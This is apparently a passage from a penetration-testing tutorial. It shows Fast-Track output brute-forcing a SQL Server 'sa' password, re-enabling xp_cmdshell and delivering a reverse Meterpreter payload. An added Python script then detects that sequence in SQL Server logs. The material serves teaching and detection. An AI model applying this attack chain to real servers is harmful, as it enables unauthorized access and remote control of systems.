


Brute forcing password of Sqlserver on IP
Brute forcing password of SqlServer on IP
Brute forcing password of Password1 on IP

. . . SNIP . . .

The following SQL Servers were compromised:

1. *** U/N: sa P/W: password ***


To interact with system, enter the SQL Server number.

Example: 1. you would type 1

Enter the number:  

After selecting Attempt SQL Ping and Auto Quick Brute Force, you will be prompted for a SQL database username, followed by the range of IP addresses you want to scan. Answer  when asked whether you want to perform advanced server identification. Although slow, this can be very 

The preceding output shows that Fast-Track successfully brute forced a system with the username of sa and password password. At this point, you can select the payload and compromise the system, as shown here.

Enter number here: 


Enabling: XP_Cmdshell...
Finished trying to re-enable xp_cmdshell stored procedure if disabled.

Configuration file not detected, running default path.
Recommend running install to configure Fast-Track.
Setting default directory...
What port do you want the payload to connect to you on: 


Metasploit Reverse Meterpreter Upload Detected..
Launching Meterpreter Handler.
Creating Metasploit Reverse Meterpreter Payload..
Sending payload: c88f3f9ac4bbe0e66da147e0f96efd48dad6
Sending payload: ac8cbc47714aaeed2672d69e251cee3dfbad
Metasploit payload delivered..
Converting our payload to binary, this may take a few...
Cleaning up...
Launching payload, this could take up to a minute...
When finished, close the metasploit handler window to return to other 
compromised SQL Servers.
[*] Please wait while we load the module tree...
[*] Handler binding to LHOST
[*] Started reverse handler
[*] Starting the payload handler...
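
The sequence in the output above (repeated password guesses against one login, a successful logon, then xp_cmdshell being re-enabled) leaves a recognizable trail in the SQL Server error log. The following is an added detection example, not part of the original text or of Fast-Track; the sample lines are constructed, the function name analyze and the threshold are hypothetical, and it assumes login auditing records both failed and successful logins.

```python
import re

# Constructed ERRORLOG-style sample lines (not taken from the original page).
SAMPLE_LOG = """\
2011-05-02 10:14:01.10 Logon       Login failed for user 'sa'. Reason: Password did not match that for the login provided. [CLIENT: 192.0.2.50]
2011-05-02 10:14:01.35 Logon       Login failed for user 'sa'. Reason: Password did not match that for the login provided. [CLIENT: 192.0.2.50]
2011-05-02 10:14:01.60 Logon       Login failed for user 'app'. Reason: Password did not match that for the login provided. [CLIENT: 192.0.2.7]
2011-05-02 10:14:01.85 Logon       Login failed for user 'sa'. Reason: Password did not match that for the login provided. [CLIENT: 192.0.2.50]
2011-05-02 10:14:02.05 Logon       Login succeeded for user 'app'. Connection made using SQL Server authentication. [CLIENT: 192.0.2.7]
2011-05-02 10:14:02.10 Logon       Login succeeded for user 'sa'. Connection made using SQL Server authentication. [CLIENT: 192.0.2.50]
2011-05-02 10:14:03.40 spid53      Configuration option 'xp_cmdshell' changed from 0 to 1. Run the RECONFIGURE statement to install.
"""

LOGIN = re.compile(r"Login (failed|succeeded) for user '([^']+)'.*\[CLIENT: ([^\]]+)\]")
XP_ON = re.compile(r"Configuration option 'xp_cmdshell' changed from 0 to 1")

def analyze(log_text, threshold=3):
    """Return findings as (kind, client, login) tuples, in log order."""
    failures = {}        # (client, login) -> failed attempts since last success
    last_suspect = None  # most recent (client, login) that succeeded after a burst
    findings = []
    for line in log_text.splitlines():
        m = LOGIN.search(line)
        if m:
            outcome, login, client = m.groups()
            key = (client, login)
            if outcome == "failed":
                failures[key] = failures.get(key, 0) + 1
            else:
                if failures.get(key, 0) >= threshold:
                    last_suspect = key
                    findings.append(("bruteforce_success", client, login))
                failures[key] = 0
        elif XP_ON.search(line):
            # The config line names no client, so correlation is by order only.
            client, login = last_suspect or (None, None)
            findings.append(("xp_cmdshell_enabled", client, login))
    # Bursts that never succeeded are still worth reporting.
    for (client, login), count in failures.items():
        if count >= threshold:
            findings.append(("bruteforce_attempt", client, login))
    return findings

if __name__ == "__main__":
    for finding in analyze(SAMPLE_LOG):
        print(finding)
```

A single mistyped password followed by a good logon (the app login in the sample) stays below the threshold and produces no finding.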